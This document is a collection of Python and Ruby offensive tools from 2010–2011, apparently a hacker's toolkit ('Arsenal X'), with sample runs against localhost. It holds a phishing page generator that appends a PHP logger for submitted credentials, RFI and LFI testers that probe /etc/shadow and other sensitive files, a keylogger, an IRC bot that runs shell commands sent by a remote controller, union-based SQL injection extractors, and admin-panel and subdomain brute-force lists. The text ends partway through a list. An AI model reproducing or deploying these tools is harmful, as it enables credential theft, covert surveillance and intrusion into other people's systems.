#!usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() : 
 print "\n--== RFI Tester ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()

def test(web):
 try:
  print "\n[+] Testing vulnerability RFI in",web
  code = toma(web+"http://www.supertangas.com")
  if(re.findall("Los mejores TANGAS de la red",code,re.I)):
   print "[+] RFI Detected"
  else:
   print "[-] RFI Not Found" 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 test(sys.argv[1])

copyright()


#The End

python rfi.py http://127.0.0.1/rfi.php?index=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
 file = open(filename,"w")
 file.write(text)
    

def header() : 
 print "\n\n--== Phising Gen ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def gen(web,new):
 try:
  print "\n[+] Working in the phishing"
  code = toma(web) 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  print "[+] The fake was save in",new
  savefile(new,code+"\n\n"+text)
 except:
  pass

header()

if len(sys.argv) != 3 : 
 show()

else :
 gen(sys.argv[1],sys.argv[2])

copyright()

#The End	

C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010

#!usr/bin/perl
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() : 
 print "\n--== LFI T00l ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def fuzz(web):
 print "\n[+] Fuzzing files...\n"
 for file in files:
  code = toma(web+file)
  if not (re.findall("No such file or directory in",code)):
   print "[File Found] : ",web,file
  


def test(web):
 try:
  print "\n[+] Testing vulnerability LFI in",web
  code = toma(web+"'")
  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
   print "\n[+] LFI Detected"
   print "[+] Full Path discloure : ",fpd[0]
   fuzz(web)
  else:
   print "[-] LFI Not Found" 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 test(sys.argv[1])

copyright()


#The End

python lfi.py http://127.0.0.1/lfi.php?file=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
 file = open(name,"a")
 file.write(text+"\n")
 file.close()

def toma(frase):
 savefile("logs.txt",frase.Key)

def capturar():
 nave = pyHook.HookManager()
 nave.KeyDown = toma
 nave.HookKeyboard()
 pythoncom.PumpMessages()

while 1:
 capturar()

# The End

cmdnow TUCOMANDO

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()	
try:
 irc.connect((host,6667))
 irc.send("NICK "+nick+"\r\n")
 irc.send("USER "+nick+" 1 1 1 1\r\n")
 irc.send("JOIN "+canal+"\r\n")
 print "[+] Insane Bot Online\n"
 while 1:
  code = irc.recv(9999)
  if re.findall("PING",code):
   irc.send("PONG "+code.split()[1]+"\r\n")
  if re.findall("PRIVMSG",code):
   nick = code.split("!")
   nick = nick[0].replace(":","")
   msg = code.split(":")[2:][0]
   if re.findall("cmdnow",code):
    cmd = code.split("cmdnow")[1]
    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    if rea:
     re1 = rea.stdout.read()
     total = re1.replace("\n","|") 
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    else:
     re2 = rea.stderr.read()
     total = re2.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    
   
except:
 print "\n\n[-] Error\n\n"


# The End

#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

global x,socket

def execa() :


 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((str(host.get()),80))
 s.send(cmd.get()+"\r\n")
 data = s.recv(666)
 s.close()
 panel.insert(END,repr(data))

   
 
window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)	


window.mainloop()

#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
 print "\n\n -- == Google Iny == --\n"

def copyright(): 
 print "\n(C) Doddy Hackman 2011\n"
 sys.exit(1)


def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()


def show():
 print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

 limpia = []
 for p in pag:
  if not (re.findall("http://www.google.com.ar",p,re.I)):
   if p not in limpia:
    limpia.append(p)
 return limpia


def sql(webs):
 for web in webs :
  if re.findall("=",web): 
   web = re.split("=",web)
   web = web[0]+"="
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[SQLI] : ",web,"\n"
   except:
    pass

def scan(dork,count): 
 pag = []
 s = 10  
 while s <= int(count):
  try:
   code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
   d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
   s += 10
   for a in d:
    pag.append(a)
  except:
   copyright()
 pag = limpiar(pag)

 return pag

head()
 
if len(sys.argv) != 3:
 show()
else :
 print "\n[+] SQL Scan Started\n"
 print "[+] Dork : ",sys.argv[1]
 print "[+] Count : ",sys.argv[2]
 pages = scan(sys.argv[1],sys.argv[2])
 print "\n[+] Webs Found : ",len(pages),"\n"
 sql(pages)

copyright()

#!usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() : 
 print "\n--== Fuzz DNS ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()


def search(web):
 print "\n[+] Searching DNS in",web,"\n"
 try:
  for d in dns:
   toma("http://"+d+"."+web)
   print "[DNS Link] : http://"+d+"."+web 
 except:
  pass

header()

if len(sys.argv) != 2 : 
 show()

else :
 search(sys.argv[1])

copyright()


#The End

C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com 

(C) Doddy Hackman 2010

#!usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 20111

from ftplib import FTP
import sys


def head():
 print "\n -- == FTP Manger == --\n\n"

def copyright():
 print "\n\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def show():
 print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
 print "\n"
 print "1 : dir"
 print "2 : cwd"
 print "3 : chdir"
 print "4 : delete dir"
 print "5 : delete file"
 print "6 : rename file"
 print "7 : make directory"
 print "8 : size"
 print "9 : abort\n\n"
 op = input("[Option] : ")
 return op


def enter(host,user,password):	
 print "[+] Connecting to ",host,"\n"
 enter = FTP(host,user,password)
 print "\n[+] Enter in the system\n"

 def menu2():
  op = menu()
  if op == 1:
   try:
    lista = enter.dir()
    for a in lista:
     print a
    menu2()
   except:
    menu2()
  elif op == 2:
   try:
    print "\n\n[+] Path : "+enter.pwd()+"\n\n"
    menu2() 
   except:
    menu2()
  elif op == 3:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.cwd(dir)
    print "\n\n[+] Directory Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 4:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.rmd(dir)
    print "\n\n[+] Directory Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 5:
   try:
    file = raw_input("\n\n[File] : ")
    enter.delete(file)
    print "\n\n[+] File Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 6:
   try:
    oldfile = raw_input("\n\n[Name] : ")
    newfile = raw_input("\n[New Name] : ")
    enter.rename(oldfile,newfile) 
    print "\n\n[+] Name Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 7:
   try:
    dir = raw_input("\n\n[New Directory] : ")
    enter.mkd(dir)
    print "\n\n[+] Directory Created\n\n"
    menu2()
   except:
    menu2()
  elif op == 8:
   try:
    file = raw_input("\n\n[File] : ")
    peso = enter.size(file)
    print "\n\n[+] ",peso," KB \n\n"
    menu2()
   except:
    menu2()
  elif op == 9:
   enter.quit()
   copyright()
  
  else:
   menu2()      
 menu2()



head()

if len(sys.argv) != 4:
 show()
else:
 enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()

#!usr/bin/python
#Finder Admin (C) Doddy Hackman

import sys,httplib,os

os.system("cls")

panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

def header() : 
 print "\n--== Finder Admin ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

header()

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web,path):
 nave = httplib.HTTPConnection(web)
	 nave.request("GET","/"+path)
 return nave.getresponse().status	

def buscar(web):
 print "\n[+] Target : ",web,"\n\n"
 for path in panels: 
  try:
   code = toma(web,path)
   if code ==200:
    print "[Link] : "+web+"/"+path
  except(KeyboardInterrupt):
   copyright()
  except:
   pass

if len(sys.argv) != 2 : 
 show()

else:
 buscar(sys.argv[1])

copyright()


#The End

python finder.py 127.0.0.1

--== Finder Admin ==--


[+] Target :  127.0.0.1


[Link] : 127.0.0.1/admin/
[Link] : 127.0.0.1/login.php
[Link] : 127.0.0.1/phpmyadmin/


(C) Doddy Hackman 2010

#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010

import os,sys,urllib2,re


def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")


def header() : 
 print "\n--== Easy Inyector ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")

def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
 code0 = toma(web1)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "concat(0x4b30425241,1,0x4b30425241)"
 for te in range(2,30):
  number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
   print "\n[+] Scan Finished\n"
   sys.exit(1)
 print "[-] Length dont found\n"
   
    
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()


header()

if len(sys.argv) != 2 : 
 show()

else :
 try:
  scan(sys.argv[1],"--")
 except:
  copyright()


#The End

C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010

#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import subprocess	

global x

def execa() :
  re = subprocess.Popen(cmd.get(),shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  if re:
   panel.insert(END,re.stdout.read())
  else:
   panel.insert(END,re.stderr.read())
   
 
window = Tk()
window.title("Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="320")
window.minsize(width="400",height="320")

window.configure(background="black")
window.configure(cursor="tcross")

cmd = StringVar()
panel = Text(window,width=30,height=15,bg="black",fg="green")

Label(window,bg="black").grid(row=1)
Label(window,text="Command : ",bg="black",fg="green").grid(row=3,column=4)

entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="green").grid(row=3,column=5)

Button(text="Cargar",bg="black",fg="green",activebackground="green",command=execa).grid(row=3,column=9)


Label(window,bg="black").grid(row=4)
panel.grid(row=10,column=5)	


window.mainloop()

#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] sqli.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def details(web,more) 
web1 = more.sub(/hackman/,"0x4b30425241")
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
  print "[username] : "+$1+"\n"
  print "[database] : "+$2+"\n"
  print "[version] : "+$3+"\n\n"

test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
  print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
 print "[mysql.user] : ON"
end


else 
  print "\n[-] Not Found\n\n"
end
end


def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
  print "[+] SQLI Detected\n\n"
  else
  print "[-] Not Vulnerable to SQLI\n\n"
  copyright()
end

z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
z = z.sub($1,"hackman")
print "[SQLI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
copyright()
end
end
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head() 
  print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0]) 
  copyright()  
end
copyright()

#The End ?

#!usr/bin/ruby
#PHishing Gen (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'

def uso
  print "\n[+] fake.rb <site> <result>\n"
end

def toma(web)
   return Net::HTTP.get(web)
   end

def savefile(filename,text)
files = File.open(filename,'a')
files.puts text
end

def gen(web,file,magic)
  print "\n\n[+] Getting the source...\n"
  begin
  code = toma(URI.parse(web))
  savefile(file,code+"\n"+magic)
  print "[+] Finish"
  copyright()
  end
end

def head() 
  print "\n\n -- == Phising Gen == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] and !ARGV[1]
  uso()
else 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  gen(ARGV[0],ARGV[1],text)  
end
copyright()

#!usr/bin/ruby
#Panel cONTROL (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp'